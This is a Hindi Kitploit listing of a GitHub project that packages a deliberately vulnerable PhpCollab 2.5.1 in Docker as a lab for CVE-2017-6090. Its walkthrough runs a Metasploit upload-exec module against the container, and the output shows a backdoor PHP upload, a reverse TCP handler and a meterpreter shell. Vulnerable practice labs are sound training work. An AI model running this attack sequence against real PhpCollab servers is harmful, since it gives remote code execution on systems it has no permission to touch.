Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-CVE-2017-6090 — कंटेनरीकृत शोषणीय PhpCollab | Kitploit
उपकरण/GitHubGitHub/jlk/exploit-cve-2017-6090
कंटेनर सुरक्षाशोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubjlk/exploit-cve-2017-6090

exploit-CVE-2017-6090

कंटेनरीकृत शोषणीय PhpCollab

रिपॉजिटरी देखें
148 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Containerized exploitable CVE-2017-6090

Docker Pulls License

यह प्रोजेक्ट PhpCollab 2.5.1 चलाने वाला एक कंटेनर बनाता है, जिसमें CVE-2017-6090 में वर्णित रिमोट कोड निष्पादन भेद्यता है। इसके अलावा, उस कंटेनर और mysql को शुरू करने के लिए एक डॉकर-कम्पोज़ फ़ाइल है जो डेमो दिखाने के लिए है, और शोषण के निर्देश नीचे दिए गए हैं।

निर्माण

docker build -t containername . या छवि jlkinsel/exploit-cve-2017-6090 का उपयोग करें

चलाना और कॉन्फ़िगर करना

इस चीज़ को चालू करने का सबसे आसान तरीका संलग्न docker-compose.yml फ़ाइल का उपयोग करना है। अगर मैं किसी बिंदु पर ऊब जाता हूं - या लोग रुचि दिखाते हैं - तो मैं एक kubernetes डिप्लॉयमेंट या helm चार्ट बनाऊंगा।

तो, चीजों को शुरू करने के लिए:

root@kitploit:~
docker-compose up

अब तक सब ठीक है! अब, phpcollab को डेटाबेस का उपयोग करने के लिए कॉन्फ़िगर करने और एक डिफ़ॉल्ट व्यवस्थापक पासवर्ड देने की आवश्यकता है। मैंने (संक्षेप में) इसे स्वचालित करने की कोशिश की, लेकिन... ठीक है... आपको ब्राउज़र का उपयोग करना आता है...

  • http://localhost:8088 पर जाएं
  • GPL के नीचे तक स्क्रॉल करें, "Offline installation" बॉक्स पर क्लिक करें और फिर Step 2 पर क्लिक करें
  • फ़ील्ड में निम्न डेटा दर्ज करें, फिर Save पर क्लिक करें:

अंत में, आप लॉग इन कर सकते हैं और इधर-उधर देख सकते हैं, लेकिन शोषण के लिए आवश्यक नहीं है।

नोट

ध्यान दें कि यह डॉकर कंपोज़िशन स्टोरेज के लिए कुछ खास नहीं कर रहा है। यदि आप mysql डेटाबेस को स्थायी बनाना चाहते हैं, तो आपको docker-compose.yml में mysql सेवा परिभाषा में एक वॉल्यूम परिभाषा जोड़नी होगी। mariadb docker hub page पर उदाहरण देखें।

शोषण

पहले - एप्लिकेशन को चालू करने के लिए ऊपर Run & Configure का पालन करें।

मैंने इस प्रोजेक्ट में कोई शोषण नहीं जोड़ा, क्योंकि, खैर, Metasploit।

MSF में नए हैं? यहां हमने अभी शुरू किए गए कंटेनर का शोषण करने का एक त्वरित अवलोकन है:

root@kitploit:~
docker run -ti --network exploitcve20176090_default remnux/metasploit

इसे शुरू होने में कुछ मिनट लगते हैं। remnux/metasploit डॉकर हब पृष्ठ वॉल्यूम का उपयोग करने के बारे में बताता है ताकि भविष्य में इसमें उतना समय न लगे। लेकिन हम अब लगभग तैयार हैं!

एक बार जब आपको शेल प्रॉम्प्ट मिल जाए, तो आगे बढ़ते हैं:

root@kitploit:~
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit

[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php

meterpreter >

इस बिंदु पर, आप अंदर हैं, और खेल शुरू हो सकते हैं।

नोट

यदि इस निर्देशिका का नाम "exploit-CVE-2017-6090" के अलावा कुछ और है, तो आपको ऊपर --network कमांड बदलना होगा।

साथ ही - हां, हमने msfconsole में रिमोट पोर्ट 80 सेट किया, भले ही बाहरी रूप से यह 8088 है। मेटास्प्लॉइट कंटेनर phpcollab कंटेनर के समान नेटवर्क पर है।

टूल डाउनलोड करें
फ़ील्डमान
Database servermysql
Database loginphpcollab
Database passwordchangeme
Database namephpcollab
NotificationsFalse
Admin passwordchangeme (या जो चाहें)